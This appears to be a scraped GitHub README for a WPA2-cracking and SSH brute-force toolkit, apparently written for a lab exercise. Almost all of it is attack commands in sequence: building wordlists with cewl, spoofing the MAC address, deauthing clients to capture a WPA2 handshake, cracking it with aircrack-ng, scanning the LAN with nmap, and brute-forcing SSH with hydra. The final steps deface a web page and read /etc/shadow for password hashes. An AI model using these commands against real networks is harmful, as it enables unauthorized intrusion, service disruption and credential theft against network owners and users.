iamseki / wpa2-ssh-automated-attack

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Wordlist Crawler

  • sudo apt install cewl

  • cewl -d 1 -m 8 -w wordlist-d1m8-samecase.txt https://avengers.marvelhq.com/

  • cewl -d 1 -m 8 -w wordlist-d1m8-lowercase.txt https://avengers.marvelhq.com/ --lowercase

  • cewl -d 2 -m 8 -w wordlist-d2m8-lowercase.txt https://avengers.marvelhq.com/ --lowercase

  • cewl -d 1 -m 1 -w wordlist-d1m1-lowercase.txt https://avengers.marvelhq.com/ --lowercase

  • cewl -d 1 -m 1 -w wordlist-d1m1-samecase.txt https://avengers.marvelhq.com/

  • cewl -d 2 -m 1 -w wordlistd2m1-d2m1-lowercase.txt https://avengers.marvelhq.com/ --lowercase

curl "https://avengers.marvelhq.com/" | sed 's/[^a-zA-Z ]/ /g' | tr 'A-Z ' 'a-z\n' | grep '[a-z]' | sort -u > wordlist.txt

WPA2 Brute Force

  • The shortest password allowed with WPA2 is 8 characters long
  • sudo su
  • echo | sudo -S

Start and Check Wifi Adapter Monitor Mode

  • iwconfig

  • airmon-ng check kill

  • airmon-ng

  • airmon-ng start wlan0

Attack 1 (Moodle)

  1. airmon-ng

  2. macchanger --mac 00:11:22:33:44:55 wlan0

  3. macchanger -s wlan0 (60:a4:b7:22:74:9f)

  4. airmon-ng start wlan0

  5. airodump-ng wlan0

to retrieve bssid mac and chanel

  1. airodump-ng -c 1 -w file --bssid 48:29:52:46:92:CB wlan0

  2. aireplay-ng --deauth 1 -a 48:29:52:46:92:CB -c 60:a4:b7:22:74:9f wlan0

  3. aircrack-ng -w wordlist.txt file-01.cap

Discover information about router

To retrieve MAC ADDRESS, CHANNEL and ESSID use:

  • sudo airodump-ng wlan0
    • MA => 48:29:52:46:92:CB
    • CH => 1
    • ESSID => Casa_wifi

Attack 2

  1. To check station connected to the router:
  • sudo airodump-ng -c 1 wlan0 -d 48:29:52:46:92:CB
    • Specify the channel to use aireplay correctly
  1. Run this analyzes packets before deauth everyone to writes handshake to a file:
  • sudo airodump-ng -w hacktest -c 1 --bssid 48:29:52:46:92:CB wlan0
  1. To forces deauth everyone:
  • sudo aireplay-ng --deauth 0 -a 48:29:52:46:92:CB wlan0
  1. Uses the hack01-01.cap to analyze in wireshark: search for *eapol which is the handshake protocol used to auth

  2. Check for the second message of the handshake in:

    • 802.1X authentication
    • WPA KEY DATA: 30140100000fac040100000fac040100000fac020c00
    • the handshake packets is needed to step 6 can try a bunch of random passwords...
  • ⚠️ we can skip the step 4 e 5 above and just try the step 6 and with lucky it works ⚠️
  1. sudo aircrack-ng hack-01.cap -w wordlist.txt
    • and the outputs should appear !!!
    • sudo aircrack-ng hack01-01.cap -w /usr/share/wordlists/rockyou.txt

SSH Brute Force

  • systemctl start ssh.socket

  • systemctl stop ssh.socket

  • sudo airmon-ng stop wlan0

  • sudo service NetworkManager restart

  • iwconfig

  • ifconfig

  • sudo nmap -sP

  • sudo nmap -sP -p 80,22

  • sudo nmap 192.168.0.* -p ssh --open

  • sudo nmap 192.168.15.* --open

  • ssh user@ipaddress

  • hydra -l root -P /usr/share/wordlists/rockyou.txt -t 4 ssh

  • hydra -L /usr/share/wordlists.rockyou.txt -P /usr/share/wordlists/rockyou.txt -M Documents/ip.txt -t 4 ssh

-L list of users -M list of ips

Final Steps

  • sudo vim /var/www/html/index.html
  • ls -l /etc/passwd => to see owner, first column name
  • cat /etc/passwd => users
  • cat /etc/shadow => users and password hash

Helix Fingerprint

Port         Transport             Protocol 

22              TCP            SSH 
5000            TCP            Helix Web Interface
3030            TCP            Helix Orchestrator
22443           TCP            Helix Hardware Monitor
1026            TCP            CEF Context Broker 
27000           TCP            MongoDB 
5050            TCP            Cygnus
1883            TCP            Eclipse-Mosquitto
4041            TCP            IoT Agent MQTT 



Language:Go 98.2%Language:Makefile 1.8%